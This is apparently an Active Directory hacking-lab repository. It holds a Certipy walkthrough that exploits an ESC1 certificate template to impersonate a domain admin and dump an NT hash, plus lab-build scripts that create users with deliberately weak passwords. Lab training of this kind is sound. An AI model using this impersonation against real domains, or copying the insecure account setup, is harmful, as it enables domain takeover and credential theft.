836 | [*] Found 1 certificate authority
837 | [*] Found 14 enabled certificate templates
838 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA
839 | [!] Got error while trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
840 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via RRP
841 | [!] Failed to connect to remote registry. Service should be starting now. Trying again...
842 | [*] Got CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA'
843 | [*] Saved BloodHound data to '20240702112224_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
844 | [*] Saved text output to '20240702112224_Certipy.txt'
845 | [*] Saved JSON output to '20240702112224_Certipy.json'
846 |
847 |
848 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ gedit 20240702112224_Certipy.txt
849 |
850 |
851 | Certificate Authorities
852 | 0
853 | CA Name : hacklab-WIN-8HPLF8PSHC1-CA
854 | DNS Name : WIN-8HPLF8PSHC1.hacklab.local
855 | Certificate Subject : CN=hacklab-WIN-8HPLF8PSHC1-CA, DC=hacklab, DC=local
856 | Certificate Serial Number : 354DB064F33080BD4EB9FEAABE87DCF1
857 | Certificate Validity Start : 2024-04-23 13:56:37+00:00
858 | Certificate Validity End : 2029-04-23 14:06:33+00:00
859 | Web Enrollment : Disabled
860 | User Specified SAN : Disabled
861 | Request Disposition : Issue
862 | Enforce Encryption for Requests : Enabled
863 | Permissions
864 | Owner : HACKLAB.LOCAL\Administrators
865 | Access Rights
866 | ManageCertificates : HACKLAB.LOCAL\Administrators
867 | HACKLAB.LOCAL\Domain Admins
868 | HACKLAB.LOCAL\Enterprise Admins
869 | ManageCa : HACKLAB.LOCAL\Administrators
870 | HACKLAB.LOCAL\Domain Admins
871 | HACKLAB.LOCAL\Enterprise Admins
872 | Enroll : HACKLAB.LOCAL\Authenticated Users
873 | Certificate Templates
874 | 0
875 | Template Name : Vuln_Cert
876 | Display Name : Vuln_Cert
877 | Certificate Authorities : hacklab-WIN-8HPLF8PSHC1-CA
878 | Enabled : True
879 | Client Authentication : True
880 | Enrollment Agent : False
881 | Any Purpose : False
882 | Enrollee Supplies Subject : True
883 | Certificate Name Flag : EnrolleeSuppliesSubject
884 | Enrollment Flag : PublishToDs
885 | IncludeSymmetricAlgorithms
886 | Private Key Flag : 16777216
887 | 65536
888 | ExportableKey
889 | Extended Key Usage : Client Authentication
890 | Secure Email
891 | Encrypting File System
892 | Requires Manager Approval : False
893 | Requires Key Archival : False
894 | Authorized Signatures Required : 0
895 | Validity Period : 1 year
896 | Renewal Period : 6 weeks
897 | Minimum RSA Key Length : 2048
898 | Permissions
899 | Enrollment Permissions
900 | Enrollment Rights : HACKLAB.LOCAL\Domain Admins
901 | HACKLAB.LOCAL\Domain Users
902 | HACKLAB.LOCAL\Enterprise Admins
903 | HACKLAB.LOCAL\Authenticated Users
904 | Object Control Permissions
905 | Owner : HACKLAB.LOCAL\Administrator
906 | Write Owner Principals : HACKLAB.LOCAL\Domain Admins
907 | HACKLAB.LOCAL\Enterprise Admins
908 | HACKLAB.LOCAL\Administrator
909 | Write Dacl Principals : HACKLAB.LOCAL\Domain Admins
910 | HACKLAB.LOCAL\Enterprise Admins
911 | HACKLAB.LOCAL\Administrator
912 | Write Property Principals : HACKLAB.LOCAL\Domain Admins
913 | HACKLAB.LOCAL\Enterprise Admins
914 | HACKLAB.LOCAL\Administrator
915 | [!] Vulnerabilities
916 | ESC1 : 'HACKLAB.LOCAL\\Domain Users' and 'HACKLAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
917 |
918 |
919 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template Vuln_Cert -dc-ip 192.168.68.230 -ptt -upn 'da1@hacklab.local' -debug
920 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
921 |
922 | [+] Domain retrieved from CCache: HACKLAB.LOCAL
923 | [+] Username retrieved from CCache: g.white
924 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230'
925 | [+] Generating RSA key
926 | [*] Requesting certificate via RPC
927 | [+] Using Kerberos Cache: g.white.ccache
928 | [+] Using TGT from cache
929 | [+] Username retrieved from CCache: g.white
930 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
931 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
932 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
933 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
934 | [*] Successfully requested certificate
935 | [*] Request ID is 10
936 | [*] Got certificate with UPN 'da1@hacklab.local'
937 | [*] Certificate has no object SID
938 | [*] Saved certificate and private key to 'da1.pfx'
939 |
940 |
941 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx da1.pfx -dc-ip 192.168.68.230
942 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
943 |
944 | [*] Using principal: da1@hacklab.local
945 | [*] Trying to get TGT...
946 | [*] Got TGT
947 | [*] Saved credential cache to 'da1.ccache'
948 | [*] Trying to retrieve NT hash for 'da1'
949 | [*] Got hash for 'da1@hacklab.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
950 |
951 |
952 | ```
953 |
--------------------------------------------------------------------------------
/Hack_Lab_Domain.md:
--------------------------------------------------------------------------------
1 | **Creating a hack lab domain**
2 |
3 | Tested on Server 2008 R2, Server 2019 and Server 2022.
4 |
5 | For Server 2008 - The following one-liner will convert a Server 2008 R2 machine into a domain controller. Right click on CMD and run as administrator, then copy and paste the single line below in one go. (Read it carefully before running; it will set up a domain called hacklab.local.)
6 |
7 | ```
8 | dcpromo /unattend /InstallDns:yes /dnsOnNetwork:yes /replicaOrNewDomain:domain /newDomain:forest /newDomainDnsName:hacklab.local /DomainNetbiosName:hacklab /databasePath:"c:\Windows\ntds" /logPath:"c:\Windows\ntdslogs" /sysvolpath:"c:\Windows\sysvol" /safeModeAdminPassword:Passw0rd! /forestLevel:2 /domainLevel:2 /rebootOnCompletion:yes
9 | ```
10 |
11 | For server 2019 and onwards - A PS one-liner to convert your server 2019 into a lab DC.
12 |
13 | ```
14 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force ; Install-WindowsFeature AD-Domain-Services ; Import-Module ADDSDeployment ; Install-ADDSForest -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2008R2" -DomainName "hacklab.local" -DomainNetbiosName "HACKLAB" -ForestMode "Win2008R2" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$true -SysvolPath "C:\Windows\SYSVOL" -Force:$true ; Add-WindowsFeature RSAT-AD-Tools ; Restart-Computer
15 | ```
16 |
17 | Set up a static IP on server 2019
18 |
19 | ```
20 | New-NetIPAddress -InterfaceAlias Ethernet0 -IPAddress ADD-Your-IP-Address-Here -PrefixLength 24 -DefaultGateway ADD-Your-DG-IP-Address-Here ; Set-DnsClientServerAddress -InterfaceAlias Ethernet0 -ServerAddresses ADD-Your-DNS-IP-Address-Here ; Restart-Computer
21 | ```
22 |
23 | Build the fake AD lab
24 |
25 | After a reboot, right click on PowerShell and run as administrator, then copy the sections below and paste them in.
26 | This will create the OUs and assign users to the department names. Each password, which is very weak, is the same; this is simply to create a lab domain for hacking, so feel free to edit each password in the script as you require. It will also set up a Service Principal Name (SPN) for some accounts, so you can kerberoast them.
27 |
28 | ```
29 | # Add the Departments organizational unit (OU), then the IT and Head_Office OUs with their nested department OUs. DNs are quoted so PowerShell does not split them at the commas.
30 |
31 | dsadd ou "ou=Departments,dc=hacklab,dc=local"
32 | dsadd ou "ou=IT,ou=Departments,dc=hacklab,dc=local"
33 | dsadd ou "ou=Admins,ou=IT,ou=Departments,dc=hacklab,dc=local"
34 | dsadd ou "ou=Service_Accounts,ou=IT,ou=Departments,dc=hacklab,dc=local"
35 | dsadd ou "ou=Help_Desk,ou=IT,ou=Departments,dc=hacklab,dc=local"
36 | dsadd ou "ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
37 | dsadd ou "ou=HR,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
38 | dsadd ou "ou=Sales,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
39 | dsadd ou "ou=Accounts,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
40 | dsadd ou "ou=Research,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
41 | dsadd ou "ou=Reception,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
42 | dsadd ou "ou=Administration,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
43 | dsadd ou "ou=Senior_Management,ou=Head_Office,ou=Departments,dc=hacklab,dc=local"
44 |
45 | # Create a user groups OU
46 |
47 | dsadd ou "ou=Groups,ou=Departments,dc=hacklab,dc=local"
48 |
49 | # Create the following user groups in the Groups OU
50 |
51 | dsadd group "cn=sales,ou=Groups,ou=Departments,dc=hacklab,dc=local"
52 | dsadd group "cn=administration,ou=Groups,ou=Departments,dc=hacklab,dc=local"
53 | dsadd group "cn=accounts,ou=Groups,ou=Departments,dc=hacklab,dc=local"
54 | dsadd group "cn=help_desk,ou=Groups,ou=Departments,dc=hacklab,dc=local"
55 | dsadd group "cn=support,ou=Groups,ou=Departments,dc=hacklab,dc=local"
56 | dsadd group "cn=RDP,ou=Groups,ou=Departments,dc=hacklab,dc=local"
57 |
58 | # Create Lab Test accounts
59 |
60 | # Head_Office / Accounts
61 |
62 | dsadd user "cn=n.collins, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
63 | dsadd user "cn=o.davidson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
64 | dsadd user "cn=p.davies, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
65 | dsadd user "cn=q.dawson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
66 | dsadd user "cn=u.dixon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
67 | dsadd user "cn=r.edwards, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
68 | dsadd user "cn=s.elliot, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
69 | dsadd user "cn=t.evans, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
70 | dsadd user "cn=u.fisher, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
71 | dsadd user "cn=v.fletcher, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
72 | dsadd user "cn=w.ford, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
73 | dsadd user "cn=x.foster, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
74 | dsadd user "cn=y.fox, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
75 | dsadd user "cn=z.gibson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
76 | dsadd user "cn=a.graham, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
77 | dsadd user "cn=b.grant, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
78 | dsadd user "cn=c.gray, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
79 | dsadd user "cn=d.green, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passw0rd! -mustchpwd no -pwdneverexpires yes
80 | dsadd user "cn=b.smith, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Dragon1 -mustchpwd no -pwdneverexpires yes
81 | dsadd user "cn=c.johnason, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Baseball1 -mustchpwd no -pwdneverexpires yes
82 | dsadd user "cn=d.thomas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Abc1231 -mustchpwd no -pwdneverexpires yes
83 | dsadd user "cn=e.miller, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Football1 -mustchpwd no -pwdneverexpires yes
84 | dsadd user "cn=f.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Monkey1 -mustchpwd no -pwdneverexpires yes
85 | dsadd user "cn=g.williams, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Letmein1 -mustchpwd no -pwdneverexpires yes
86 | dsadd user "cn=t.harris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Shadow1 -mustchpwd no -pwdneverexpires yes
87 | dsadd user "cn=i.jackson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Qwertyuiop1 -mustchpwd no -pwdneverexpires yes
88 | dsadd user "cn=t.wilsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Mustang1 -mustchpwd no -pwdneverexpires yes
89 | dsadd user "cn=k.mmoore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Michael1 -mustchpwd no -pwdneverexpires yes
90 | dsadd user "cn=l.martsinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Superman1 -mustchpwd no -pwdneverexpires yes
91 | dsadd user "cn=m.marjtinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckyou1 -mustchpwd no -pwdneverexpires yes
92 | dsadd user "cn=n.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Qazwsx1 -mustchpwd no -pwdneverexpires yes
93 | dsadd user "cn=o.thompson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Killer1 -mustchpwd no -pwdneverexpires yes
94 | dsadd user "cn=p.thompson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Trustno11 -mustchpwd no -pwdneverexpires yes
95 | dsadd user "cn=q.lewis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jordan1 -mustchpwd no -pwdneverexpires yes
96 | dsadd user "cn=r.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jennifer1 -mustchpwd no -pwdneverexpires yes
97 | dsadd user "cn=s.sancshez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Zxcvbnm1 -mustchpwd no -pwdneverexpires yes
98 | dsadd user "cn=t.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Asdfgh1 -mustchpwd no -pwdneverexpires yes
99 | dsadd user "cn=u.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hunter1 -mustchpwd no -pwdneverexpires yes
100 | dsadd user "cn=v.hill, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Buster1 -mustchpwd no -pwdneverexpires yes
101 | dsadd user "cn=w.king, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Soccer1 -mustchpwd no -pwdneverexpires yes
102 | dsadd user "cn=x.rossi, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Harley1 -mustchpwd no -pwdneverexpires yes
103 | dsadd user "cn=y.darrdvis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Andrew1 -mustchpwd no -pwdneverexpires yes
104 | dsadd user "cn=z.perez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Tigger1 -mustchpwd no -pwdneverexpires yes
105 | dsadd user "cn=a.white, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Sunshine1 -mustchpwd no -pwdneverexpires yes
106 | dsadd user "cn=b.jackson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Iloveyou1 -mustchpwd no -pwdneverexpires yes -desc "Changed the users password to Iloveyou1"
107 | dsadd user "cn=c.smith, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckme1 -mustchpwd no -pwdneverexpires yes
108 | dsadd user "cn=d.taylor, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Charlie1 -mustchpwd no -pwdneverexpires yes
109 | dsadd user "cn=e.martin, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Robert1 -mustchpwd no -pwdneverexpires yes
110 | dsadd user "cn=f.thoffmas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Thomas1 -mustchpwd no -pwdneverexpires yes
111 | dsadd user "cn=g.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hockey1 -mustchpwd no -pwdneverexpires yes
112 | dsadd user "cn=h.rodrgviguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ranger1 -mustchpwd no -pwdneverexpires yes
113 | dsadd user "cn=i.johncson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Daniel1 -mustchpwd no -pwdneverexpires yes
114 | dsadd user "cn=j.miller, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Starwars1 -mustchpwd no -pwdneverexpires yes
115 | dsadd user "cn=k.jones, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Klaster1 -mustchpwd no -pwdneverexpires yes
116 | dsadd user "cn=l.davsris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd George1 -mustchpwd no -pwdneverexpires yes
117 | dsadd user "cn=m.andessrson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Computer1 -mustchpwd no -pwdneverexpires yes
118 | dsadd user "cn=y.johnfson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Michelle1 -mustchpwd no -pwdneverexpires yes
119 | dsadd user "cn=o.mooore, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Jessica1 -mustchpwd no -pwdneverexpires yes
120 | dsadd user "cn=p.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Pepper1 -mustchpwd no -pwdneverexpires yes
121 | dsadd user "cn=q.thomdas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Zxcvbn1 -mustchpwd no -pwdneverexpires yes
122 | dsadd user "cn=r.martianez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Freedom1 -mustchpwd no -pwdneverexpires yes
123 | dsadd user "cn=s.wiloson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Passmeup1 -mustchpwd no -pwdneverexpires yes
124 | dsadd user "cn=t.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fuckoff1 -mustchpwd no -pwdneverexpires yes
125 | dsadd user "cn=u.marteinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Maggie1 -mustchpwd no -pwdneverexpires yes
126 | dsadd user "cn=v.sancahez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Aaaaaa1 -mustchpwd no -pwdneverexpires yes
127 | dsadd user "cn=w.moorre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ginger1 -mustchpwd no -pwdneverexpires yes
128 | dsadd user "cn=x.thompson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Princess1 -mustchpwd no -pwdneverexpires yes
129 | dsadd user "cn=y.martsinez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Joshua1 -mustchpwd no -pwdneverexpires yes
130 | dsadd user "cn=z.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cheese1 -mustchpwd no -pwdneverexpires yes
131 | dsadd user "cn=a.miller, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Amanda1 -mustchpwd no -pwdneverexpires yes
132 | dsadd user "cn=b.rodriseguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Summer1 -mustchpwd no -pwdneverexpires yes
133 | dsadd user "cn=c.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Loveyou1 -mustchpwd no -pwdneverexpires yes
134 | dsadd user "cn=d.sancahez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Ashley1 -mustchpwd no -pwdneverexpires yes
135 | dsadd user "cn=e.wilison, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Nicole1 -mustchpwd no -pwdneverexpires yes
136 | dsadd user "cn=f.davrtsis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Chelsea1 -mustchpwd no -pwdneverexpires yes
137 | dsadd user "cn=g.mooree, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Biteme1 -mustchpwd no -pwdneverexpires yes
138 | dsadd user "cn=h.thomddfas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Matthew1 -mustchpwd no -pwdneverexpires yes
139 | dsadd user "cn=z.johnsson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Access1 -mustchpwd no -pwdneverexpires yes
140 | dsadd user "cn=j.martainez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Yankees1 -mustchpwd no -pwdneverexpires yes
141 | dsadd user "cn=k.rodrigfduez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Dallas1 -mustchpwd no -pwdneverexpires yes
142 | dsadd user "cn=l.sanchdez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Austin1 -mustchpwd no -pwdneverexpires yes
143 | dsadd user "cn=m.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Thunder1 -mustchpwd no -pwdneverexpires yes
144 | dsadd user "cn=n.davdemis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Taylor1 -mustchpwd no -pwdneverexpires yes
145 | dsadd user "cn=o.wilwson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Matrix1 -mustchpwd no -pwdneverexpires yes
146 | dsadd user "cn=p.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd William1 -mustchpwd no -pwdneverexpires yes
147 | dsadd user "cn=q.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Corvette1 -mustchpwd no -pwdneverexpires yes
148 | dsadd user "cn=r.martiynez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Martin1 -mustchpwd no -pwdneverexpires yes
149 | dsadd user "cn=s.anderson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Heather1 -mustchpwd no -pwdneverexpires yes
150 | dsadd user "cn=t.johnsron, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Secret1 -mustchpwd no -pwdneverexpires yes
151 | dsadd user "cn=u.rodrigkjuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Fucker1 -mustchpwd no -pwdneverexpires yes
152 | dsadd user "cn=v.sancghez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Merlin1 -mustchpwd no -pwdneverexpires yes
153 | dsadd user "cn=w.wilsaon, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Diamond1 -mustchpwd no -pwdneverexpires yes
154 | dsadd user "cn=x.davifis, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Gfhjkm1 -mustchpwd no -pwdneverexpires yes
155 | dsadd user "cn=y.moossre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Hammer1 -mustchpwd no -pwdneverexpires yes
156 | dsadd user "cn=z.thomssas, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Silver1 -mustchpwd no -pwdneverexpires yes
157 | dsadd user "cn=a.martinuez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Anthony1 -mustchpwd no -pwdneverexpires yes
158 | dsadd user "cn=b.hernandez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Justin1 -mustchpwd no -pwdneverexpires yes
159 | dsadd user "cn=c.robinson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Bailey1 -mustchpwd no -pwdneverexpires yes
160 | dsadd user "cn=d.clark, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Q1w2e3r4t51 -mustchpwd no -pwdneverexpires yes
161 | dsadd user "cn=e.jodhnson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Patrick1 -mustchpwd no -pwdneverexpires yes
162 | dsadd user "cn=f.sanwchez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Internet1 -mustchpwd no -pwdneverexpires yes
163 | dsadd user "cn=g.wilpson, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Scooter1 -mustchpwd no -pwdneverexpires yes
164 | dsadd user "cn=h.davxris, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Orange1 -mustchpwd no -pwdneverexpires yes
165 | dsadd user "cn=i.moofrre, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Golfer1 -mustchpwd no -pwdneverexpires yes
166 | dsadd user "cn=j.massrtainez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Cookie1 -mustchpwd no -pwdneverexpires yes
167 | dsadd user "cn=k.rodrijguez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Richard1 -mustchpwd no -pwdneverexpires yes
168 | dsadd user "cn=l.sancahez, ou=Accounts, ou=Head_Office, ou=Departments, dc=hacklab, dc=local" -fn User -ln test -pwd Samantha1 -mustchpwd no -pwdneverexpires yes
